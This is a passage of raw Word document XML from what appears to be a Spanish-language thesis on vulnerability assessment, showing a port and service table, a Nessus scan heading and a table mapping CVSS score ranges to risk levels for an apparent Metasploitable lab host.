            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B49377F"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6A568ACF"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5407D735"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4BD7EF76"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5001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360A5F3B"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46F41A59"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xml:space="preserve">java-object </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DA39FDA"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Java Object Serialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="293827AB"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5C97C14B" w14:textId="77777777" w:rsidTr="001E62FF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1518102D"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4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5731542E"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8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A774DA4"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4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DEA59C0"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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52821E6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xml:space="preserve">Apache httpd 2.2.14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D50E70" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59D0" w:rsidRPr="00837B5A" w14:paraId="74FE017B" w14:textId="77777777" w:rsidTr="001E62FF">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44DF3595" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42177F14" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>8081</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A72F5F7"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tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4752B416"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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AD3820A" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache httpd 2.2.14 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F308F81" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D003A93" w14:textId="3CD40A05" w:rsidR="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="005F2B55">
      <w:pPr>
        <w:pStyle w:val="TesisUnir"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A3611C" w14:textId="61C93468" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00F71DFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F71DFE">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Análisis con Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCDF49" w14:textId="334BF75F" w:rsidR="00F71DFE" w:rsidRPr="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00F71DFE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Se realizo también un escaneo con la herramienta Nessus para identificación de las vulnerabilidades y estos son los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD147D0" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRPr="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00F71DFE">
      <w:pPr>
        <w:pStyle w:val="Tablas"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc107059152"/>
      <w:r w:rsidRPr="00F71DFE">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Valoración de Vulnerabilidades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2992"/>
        <w:gridCol w:w="2992"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F71DFE" w14:paraId="2901FD6B" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20BCCBD5" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRPr="00481AD8" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00481AD8">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>NIVEL RIESGO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E478FC" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRPr="00481AD8" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00481AD8">
              <w:rPr>
                <w:b/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DFE" w14:paraId="61D89711" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="4C63A93E" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Critico </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26609248" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DFE" w14:paraId="734CFB88" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="4D2848E2" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alto </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D80DA8C" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DFE" w14:paraId="420B66D4" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="6B5A85F7" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AD254C9" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DFE" w14:paraId="09A2704A" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          </w:tcPr>
          <w:p w14:paraId="4A74BB9D" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B4E65C0" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.1 – 3.9 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DFE" w14:paraId="2569201A" w14:textId="77777777" w:rsidTr="00250C4A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8496B0" w:themeFill="text2" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="37BA6BF9" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CD05EE" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00250C4A">
            <w:pPr>
              <w:pStyle w:val="TesisUnir"/>
            </w:pPr>
            <w:r>
              <w:t>N / A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D015877" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="00F71DFE">
      <w:pPr>
        <w:pStyle w:val="Fuente"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuente. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"d1W4QW4m","properties":{"formattedCitation":"({\\i{}CVSS\\uc0\\u160{}Scores vs. VPR (Nessus)}, s.\\uc0\\u160{}f.)","plainCitation":"(CVSS Scores vs. VPR (Nessus), s. f.)","noteIndex":0},"citationItems":[{"id":299,"uris":["http://zotero.org/users/8059269/items/CHJ2DGB9"],"itemData":{"id":299,"type":"webpage","title":"CVSS Scores vs. VPR (Nessus)","URL":"https://docs.tenable.com/nessus/Content/RiskMetrics.htm","accessed":{"date-parts":[["2022",6,23]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="001E22DF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001E22DF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CVSS Scores vs. VPR (Nessus)</w:t>
      </w:r>
      <w:r w:rsidRPr="001E22DF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, s. f.)</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E96CDE" w14:textId="045DB3D5" w:rsidR="008D3109" w:rsidRDefault="00DB3A8F" w:rsidP="008D3109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18CAC18E" wp14:editId="744EBD95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>43816</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>123190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5334000" cy="400050"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Rectángulo 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5334000" cy="400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F993D" w14:textId="0F7684D5" w:rsidR="00DB3A8F" w:rsidRPr="00DB3A8F" w:rsidRDefault="00DB3A8F" w:rsidP="00DB3A8F">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00DB3A8F">
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>Metasplotaible – 192.168.2.102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AC18E" id="Rectángulo 6" o:spid="_x0000_s1032" style="position:absolute;margin-left:3.45pt;margin-top:9.7pt;width:420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" fillcolor="black [3213]" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0FAF993D" w14:textId="0F7684D5" w:rsidR="00DB3A8F" w:rsidRPr="00DB3A8F" w:rsidRDefault="00DB3A8F" w:rsidP="00DB3A8F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00DB3A8F">
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>Metasplotaible – 192.168.2.102</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB5A9AC" wp14:editId="438B58D3">
            <wp:extent cx="5612130" cy="1277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277620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B3277" w14:textId="77777777" w:rsidR="00F71DFE" w:rsidRDefault="00F71DFE" w:rsidP="008D3109">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E07DF9C" w14:textId="784CE3DD" w:rsidR="00C502B4" w:rsidRPr="00C502B4" w:rsidRDefault="00D85A35" w:rsidP="00C502B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:sectPr w:rsidR="00C502B4" w:rsidRPr="00C502B4" w:rsidSect="00D3738E">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1134" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6561145F" wp14:editId="439C8965">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>100965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>121285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5334000" cy="333375"/>
                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
